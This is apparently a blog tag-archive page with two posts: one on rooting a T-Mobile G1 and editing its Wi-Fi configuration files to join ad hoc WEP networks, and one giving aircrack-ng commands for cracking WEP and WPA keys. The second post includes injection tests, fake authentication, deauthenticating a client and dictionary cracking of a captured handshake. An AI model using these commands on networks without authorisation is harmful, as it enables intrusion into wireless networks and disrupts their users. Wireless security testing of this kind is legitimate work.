Tag Archives: wep

How to connect to Ad Hoc networks using Tmobile G1 Android

Intro

The G1 does not connect to ad hoc networks through the wifi manager, but we can hack it to allow scanning for and connecting to ad hoc networks. I’ve been trying to figure this out for the longest time. Before you begin, you need to root your G1 and be comfortable using the command line. We will be editing tiwlan.ini and wpa_supplicant.conf. I will show you two ways to edit the files: using vi and using adb.


Settings

edit tiwlan.ini to read:

WiFiAdHoc = 1
dot11DesiredSSID = HydtechAdhoc (or whatever name you want)
dot11DesiredBSSType = 0

edit wpa_supplicant.conf to read:

ctrl_interface=tiwlan0
update_config=1
eapol_version=1
ap_scan=2 (tells wpa_supplicant to scan hidden networks)

network={
ssid="HydtechAdhoc"
scan_ssid=1 (for APs with multiple SSIDS)
mode=1
key_mgmt=NONE
group=WEP104
auth_alg=SHARED
wep_key0="MyWepKey" (replace MyWepKey with your key)
}

How to edit using vi:

Download terminal from the market and type:

su (for superuser mode)
mount -o rw,remount -t yaffs2 /dev/block/mtdblock3 /system (mount partition as writable)
vi /system/etc/wifi/tiwlan.ini (open tiwlan.ini in vi text editor)

Now type A to enter editing mode, finish editing your file, and hold trackball+1 to stop editing. To save and exit, type :wq

vi /data/misc/wifi/wpa_supplicant.conf (open file for editing)

Edit with the settings given above and exit. Don’t forget to change the partition back to read-only:
mount -o ro,remount -t yaffs2 /dev/block/mtdblock3 /system

reboot

How to edit files with adb on Ubuntu:

Connect your G1 to the computer using a USB cable and make sure USB debugging is enabled
Open up terminal and type
cd /home/hydtech/[android sdk folder]/tools (navigate to the directory which has your adb tool)

get the files from the device and place them in the root folder
sudo ./adb pull /system/etc/wifi/tiwlan.ini /
sudo ./adb pull /data/misc/wifi/wpa_supplicant.conf /

edit and save the files with the settings provided above using gedit or kate or what have you

make the partition read-write
adb shell
mount -o rw,remount -t yaffs2 /dev/block/mtdblock3 /system
exit

place the files back onto the device
sudo ./adb push /tiwlan.ini /system/etc/wifi/tiwlan.ini
sudo ./adb push /wpa_supplicant.conf /data/misc/wifi/wpa_supplicant.conf

make partition read only again
adb shell
mount -o ro,remount -t yaffs2 /dev/block/mtdblock3 /system
exit

reboot device.

Troubleshooting

shows connected but no internet
1. I was having a problem where the connection would keep disconnecting and when it would connect, it wouldn’t load pages. To fix this I had to disable my WEP key.

SSID not showing
2. If the SSID isn’t showing up in the list, make sure you have ap_scan=2 in your wpa_supplicant.conf.

Unsuccessful connection
3. Try enabling static IP if DHCP isn’t working for you. It’s under advanced menu.
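
A check for what the wpa_supplicant.conf above (and troubleshooting fix 1) leaves on the device, as an added example that is not part of the original post: it parses network={...} blocks and flags WEP, open, shared-key and ad hoc entries. The function names and finding strings are made up for this example, and the sample input is constructed from the settings shown earlier.

```python
# Constructed sample: the network block from this post (not read from a device).
SAMPLE_CONF = '''\
ap_scan=2
network={
ssid="HydtechAdhoc"
scan_ssid=1
mode=1
key_mgmt=NONE
group=WEP104
auth_alg=SHARED
wep_key0="MyWepKey"
}
'''

def parse_networks(text):
    """Return one dict of key/value settings per network={...} block."""
    networks, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("network={"):
            current = {}
        elif line == "}" and current is not None:
            networks.append(current)
            current = None
        elif current is not None and "=" in line:
            key, value = line.split("=", 1)
            current[key.strip()] = value.strip()
    return networks

def audit(net):
    """List weak-link findings for one parsed network block."""
    findings = []
    has_wep = any(k.startswith("wep_key") for k in net)
    if net.get("key_mgmt", "").upper() == "NONE":
        findings.append("WEP: static key, recoverable from captured traffic"
                        if has_wep else "OPEN: no link-layer encryption")
    if net.get("auth_alg", "").upper() == "SHARED":
        findings.append("SHARED: shared-key authentication is WEP-only")
    if net.get("mode") == "1":
        findings.append("IBSS: ad hoc peer, no access point in the path")
    return findings

def audit_conf(text):
    """Map each SSID in the file to its list of findings."""
    return {n.get("ssid", "?").strip('"'): audit(n) for n in parse_networks(text)}
```

Run audit_conf() on the pulled copy of /data/misc/wifi/wpa_supplicant.conf; removing the wep_key0 line, as in troubleshooting fix 1, changes the first finding from WEP to OPEN.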


Cracking WEP & WPA with IBM Lenovo X60 – Basics

At first, injection with the Intel Pro Wireless cards was impossible. Then came the ipwraw driver. Now we no longer need ipwraw, as the iwl3945 driver supports injection. Most Linux distros now ship with this driver.

Follow these steps for a successful WEP crack in Ubuntu:

download necessary files
sudo apt-get install aircrack-ng

place card in monitor mode
sudo airmon-ng start wlan0

test injection
sudo aireplay-ng -9 -e linksys -a 00:14:6C:7E:40:80 mon0
(0% means injection not working)

capture data and write to file called output
sudo airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output mon0

fake authentication
sudo aireplay-ng -1 0 -e linksys -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0

replay mode
sudo aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0

run aircrack
sudo aircrack-ng -z -b 00:14:6C:7E:40:80 output*.cap

For WPA cracking follow this:

monitor mode
sudo airmon-ng start wlan0

collect handshake
sudo airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk mon0

deauth connected client
sudo aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0

cracking
sudo aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap

These are just refreshers. For more help check www.aircrack-ng.org